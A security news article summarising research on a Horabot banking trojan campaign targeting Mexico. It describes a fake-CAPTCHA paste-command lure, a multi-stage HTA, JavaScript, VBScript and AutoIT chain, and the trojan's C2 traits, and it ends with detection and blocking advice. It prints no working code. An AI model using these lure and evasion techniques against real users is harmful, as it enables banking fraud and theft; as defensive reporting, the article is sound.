A sophisticated banking trojan known as Horabot has resurfaced in an active campaign that is currently targeting users across Mexico. This renewed assault combines a multi-stage infection chain with an email worm, effectively transforming every compromised machine into a phishing relay. The threat actors are leveraging a Delphi-based banking trojan, bolstered by a PowerShell-driven spreader, presenting one of the more layered financially motivated threats observed in the Latin American region.
The campaign was brought to light by Securelist analysts who identified suspicious mshta execution alerts within a monitored customer environment. Their investigation traced the activity back to a fake CAPTCHA page that disseminates instructions to victims. These instructions involve opening the Windows Run dialog and pasting a malicious command. Instead of exploiting existing software vulnerabilities, the attackers are adeptly tricking users into executing a malicious HTA file, which in turn silently initiates the infection chain. This method effectively circumvents many endpoint defenses by making the victim an unwitting participant in their own compromise.
Horabot Resurfaces in Mexico with Advanced Phishing and Worm Tactics
During their analysis of the adversary’s infrastructure, researchers uncovered an exposed victim log on the attacker’s server. This log revealed a staggering 5,384 infected machines, with a significant 5,030, approximately 93%, located in Mexico. The data indicated that the operation has been active for months, with records extending back to May 2025, predating its discovery.
The operators behind this campaign exhibit clear connections to Brazil. Evidence supporting this includes comments within the spreader’s PowerShell code, which are written in casual Brazilian Portuguese. Additionally, the encryption key used for resource decryption incorporates the phrase “pega a visão,” a common Brazilian slang term translating to “get the picture.” The phishing emails themselves, however, are crafted in Spanish, designed to appear as fake invoices or confidential business documents specifically targeting Mexican recipients.
Multi-Stage Infection Mechanism
What distinguishes this particular Horabot campaign is not solely its payload but also its intricate delivery route, with each stage introducing a new layer of obfuscation before the final malware is deployed. Following the execution of the HTA file, it retrieves a JavaScript loader from a domain controlled by the attackers. This loader then proceeds to fetch and execute an obfuscated VBScript.
This VBScript employs server-side polymorphism, delivering a slightly altered version of the code with each request, a tactic designed to evade signature-based detection methods. A subsequent, more complex VBScript, exceeding 400 lines, acts as the primary execution engine for the operation. It diligently collects the victim’s IP address, hostname, username, and operating system version before transmitting this data to a command-and-control (C2) server. The script then installs AutoIT components onto the disk, establishes persistence by placing a LNK shortcut in the Startup folder, and proceeds to download the next stage of the attack.
The AutoIT script is responsible for decrypting an AES-192-encrypted blob. This decryption utilizes a key derived from the seed value ‘99521487’. The resulting DLL is then loaded directly into memory. This DLL represents the core banking trojan, which communicates with its C2 server via a custom TCP protocol. Commands are encapsulated within structured tags, and all traffic is encrypted using a stateful XOR cipher. The outgoing data is notably framed between double “##” markers, a pattern that is sufficiently rare in legitimate network traffic to serve as a reliable network detection signature.
Despite the encryption, analysts observed that the cipher’s rigid and repetitive structure actually makes it more susceptible to detection by standard Intrusion Detection System (IDS) rules. Security teams are advised to proactively block HTA file execution from untrusted sources and maintain vigilant monitoring for any suspicious mshta activity. The implementation of published YARA rules for both the Horabot Delphi trojan and the AutoIT loader, alongside a Suricata rule targeting the characteristic double “##” C2 traffic pattern, will significantly aid in the early detection of infections. All shared indicators of compromise, including the attacker-controlled domains and socket addresses, should be promptly added to network blocklists. Continuing user awareness training focused on recognizing fake CAPTCHA lures and PDF attachments containing embedded buttons remains a critical layer of defense against such evolving threats.